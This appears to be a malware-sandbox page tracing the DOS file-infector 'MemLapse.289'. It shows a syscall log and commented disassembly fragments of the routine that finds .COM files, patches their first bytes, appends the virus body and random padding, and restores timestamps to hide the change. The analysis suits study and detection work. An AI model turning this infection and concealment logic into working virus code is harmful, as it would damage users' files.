Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.289


Syscalls:

Time | Syscall Op (INT 21h function number from AH, in decimal) | PC | Syscall Name
2018-12-17T22:51:42.39865896Z 26 PC: 12a5e | Set disk transfer address
2018-12-17T22:51:42.400621666Z 78 PC: 12a67 | Find first file
2018-12-17T22:51:42.407364839Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.408841446Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.411949574Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.41483679Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.437823401Z 61 PC: 12a97 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:42.445948089Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.454896132Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.456806228Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.458772754Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.474197834Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.475945121Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.485280049Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
; Emulator disassembly window printed with the "Get time" trace row (op 44).
; It is a fragment of the per-file routine: the code before 0x12af3 and the
; jump targets 0x12a61 / 0x12a5f are not shown on this page.
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00                ; AH=2Ch -> traced as op 44 "Get time"; this load also overwrites the AL set just above
0x12afa: int 0x21
0x12afc: mov cl, dl                    ; cl = DL as left by the time call
0x12afe: add cl, al                    ; mix in AL
0x12b00: ror cl, 1
0x12b02: xor ch, ch                    ; cx = cl, i.e. a time-derived count of at most 255
0x12b04: xor dx, dx                    ; dx = 0: buffer offset passed to the write below
0x12b06: mov ah, 0x40                  ; AH=40h -> traced as op 64 "Write file or device"
0x12b08: int 0x21                      ; trace shows a different length per file here (33, 163, 166, ...), so the size growth is not constant
0x12b0a: mov cx, word ptr [0x211]      ; cx:dx reloaded from the words stored at 0x211 / 0x20f
0x12b0e: mov dx, word ptr [0x20f]      ; presumably the time/date saved by the earlier op-87 call at 0x12ac7 (not visible here)
0x12b12: mov ax, 0x5701                ; AH=57h, AL=01h: set file date/time, so the timestamp alone will not reveal the modification
0x12b15: int 0x21
0x12b17: mov ah, 0x3e                  ; AH=3Eh -> traced as op 62 "Close file"
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f                  ; AH=4Fh -> traced as op 79 "Find next file" (issued at 0x12a67)
0x12b1d: jmp 0x12a61                   ; back into the file-search loop
0x12b20: mov dx, 0x20c                 ; window ends here; the use of this value is outside this fragment
2018-12-17T22:51:42.488816379Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
; Emulator disassembly window printed with the second "Get time" trace row
; (PC 12afc). It starts mid-computation: cl was loaded from DL on the line
; fused into the trace row above. Jump targets 0x12a61, 0x12a5f and 0x12b2c
; are not shown on this page.
0x12afe: add cl, al                    ; mix AL into the time-derived byte in cl
0x12b00: ror cl, 1
0x12b02: xor ch, ch                    ; cx = cl, i.e. a byte count of at most 255
0x12b04: xor dx, dx                    ; dx = 0: buffer offset passed to the write below
0x12b06: mov ah, 0x40                  ; AH=40h -> traced as op 64 "Write file or device"
0x12b08: int 0x21                      ; the next trace row reports the variable length written (e.g. 33 bytes)
0x12b0a: mov cx, word ptr [0x211]      ; cx:dx reloaded from the words stored at 0x211 / 0x20f
0x12b0e: mov dx, word ptr [0x20f]      ; presumably the time/date saved by the earlier op-87 call at 0x12ac7 (not visible here)
0x12b12: mov ax, 0x5701                ; AH=57h, AL=01h: set file date/time, so the timestamp alone will not reveal the modification
0x12b15: int 0x21
0x12b17: mov ah, 0x3e                  ; AH=3Eh -> traced as op 62 "Close file"
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f                  ; AH=4Fh -> traced as op 79 "Find next file" (issued at 0x12a67)
0x12b1d: jmp 0x12a61                   ; back into the file-search loop
0x12b20: mov dx, 0x20c                 ; dx = offset of the path argument; the string at 0x20c is not shown on this page
0x12b23: mov ah, 0x3b                  ; AH=3Bh -> traced as op 59 "Change current directory"
0x12b25: int 0x21
0x12b27: jb 0x12b2c                    ; carry set: DOS reported an error, leave the search
0x12b29: jmp 0x12a5f                   ; otherwise restart the file search (presumably in the new directory)
2018-12-17T22:51:42.491644355Z 64 PC: 12b0a | Write file or device (Write 33 bytes on handle 5)
2018-12-17T22:51:42.495103093Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.49843906Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.50759651Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.510837566Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.513595337Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.51685675Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.518221666Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.521027061Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.522966567Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.534635286Z 61 PC: 12a97 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:42.54239947Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.550942986Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.552443397Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.55380771Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.557178945Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.558729012Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.561649115Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.56641437Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.568840242Z 64 PC: 12b0a | Write file or device (Write 163 bytes on handle 5)
2018-12-17T22:51:42.571829611Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.578643587Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.58676137Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.590462647Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.592224971Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.595322087Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.59692227Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.608676959Z 61 PC: 12a97 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:42.616233676Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.62366979Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.625531683Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.627852325Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.631072483Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.63293917Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.636762144Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.639466689Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.642246521Z 64 PC: 12b0a | Write file or device (Write 166 bytes on handle 5)
2018-12-17T22:51:42.652241082Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.653996119Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.663261363Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.677041345Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.678651522Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.681536115Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.683495648Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.694689818Z 61 PC: 12a97 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:42.701058644Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.706947931Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.709266996Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.711571138Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.713581859Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.715451886Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.717543427Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.719400481Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.723349362Z 64 PC: 12b0a | Write file or device (Write 41 bytes on handle 5)
2018-12-17T22:51:42.726834945Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.728784839Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.738524766Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.741549815Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.742913994Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.75011964Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.751991169Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.755548704Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.757772068Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.76950121Z 61 PC: 12a97 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:42.778484495Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.783614159Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.785189633Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.786617177Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.788607217Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.791138986Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.794412797Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.796858002Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.800331611Z 64 PC: 12b0a | Write file or device (Write 44 bytes on handle 5)
2018-12-17T22:51:42.803368499Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.805071104Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.814297904Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.817248081Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.818734367Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.83272117Z 61 PC: 12a97 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:42.840816066Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.848747291Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.851691038Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.863817442Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.866748551Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.868259685Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.877292204Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.879583955Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.881877434Z 64 PC: 12b0a | Write file or device (Write 174 bytes on handle 5)
2018-12-17T22:51:42.885693843Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.887314006Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.89671422Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.900382458Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.901684657Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.912315344Z 61 PC: 12a97 | Open file (Filename = 'PAH.COM')
2018-12-17T22:51:42.92089224Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.928279393Z 66 PC: 12ac2 | Move file pointer
2018-12-17T22:51:42.930086007Z 87 PC: 12ac7 | Get or set file date and time
2018-12-17T22:51:42.93273181Z 64 PC: 12ada | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:51:42.936020079Z 66 PC: 12ae3 | Move file pointer
2018-12-17T22:51:42.937935594Z 64 PC: 12aee | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:51:42.941434697Z 44 PC: 12af3 | Get time 0x12af3: mov cl, dl
0x12af5: mov al, cl
0x12af7: mov ax, 0x2c00
0x12afa: int 0x21
0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
2018-12-17T22:51:42.944120848Z 44 PC: 12afc | Get time 0x12afc: mov cl, dl
0x12afe: add cl, al
0x12b00: ror cl, 1
0x12b02: xor ch, ch
0x12b04: xor dx, dx
0x12b06: mov ah, 0x40
0x12b08: int 0x21
0x12b0a: mov cx, word ptr [0x211]
0x12b0e: mov dx, word ptr [0x20f]
0x12b12: mov ax, 0x5701
0x12b15: int 0x21
0x12b17: mov ah, 0x3e
0x12b19: int 0x21
0x12b1b: mov ah, 0x4f
0x12b1d: jmp 0x12a61
0x12b20: mov dx, 0x20c
0x12b23: mov ah, 0x3b
0x12b25: int 0x21
0x12b27: jb 0x12b2c
0x12b29: jmp 0x12a5f
2018-12-17T22:51:42.946866483Z 64 PC: 12b0a | Write file or device (Write 177 bytes on handle 5)
2018-12-17T22:51:42.95029841Z 87 PC: 12b17 | Get or set file date and time
2018-12-17T22:51:42.95219951Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.964416702Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.968395047Z 47 PC: 12a72 | Get disk transfer address
2018-12-17T22:51:42.969937583Z 67 PC: 12a92 | Get or set file attributes
2018-12-17T22:51:42.980740464Z 61 PC: 12a97 | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:42.988069459Z 63 PC: 12ab0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:42.990955128Z 62 PC: 12b1b | Close file
2018-12-17T22:51:42.993060343Z 79 PC: 12a67 | Find next file
2018-12-17T22:51:42.995573716Z 59 PC: 12b27 | Change current directory
2018-12-17T22:51:43.000991053Z 26 PC: 12b33 | Set disk transfer address